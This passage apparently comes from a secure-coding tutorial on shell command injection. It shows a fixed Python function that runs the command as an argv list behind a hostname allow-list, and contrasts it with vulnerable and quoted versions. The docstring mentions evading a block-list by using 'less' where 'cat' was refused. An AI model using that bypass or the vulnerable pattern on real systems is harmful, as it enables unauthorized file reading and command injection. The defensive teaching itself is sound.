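    """No shell at all: an argv list plus an allow-list on the value itself.
    A block-list is what this box tried (cat refused), and less walked
    straight past it; an allow-list has no second spelling to find."""
    if not HOSTNAME.match(user_input):
        raise ValueError("invalid host")
    result = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return result.stdout
```

Running run_vulnerable(INJECTION) prints two lines because the shell executed two commands; run_quoted prints the whole input as one line; run_fixed refuses it before anything runs.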
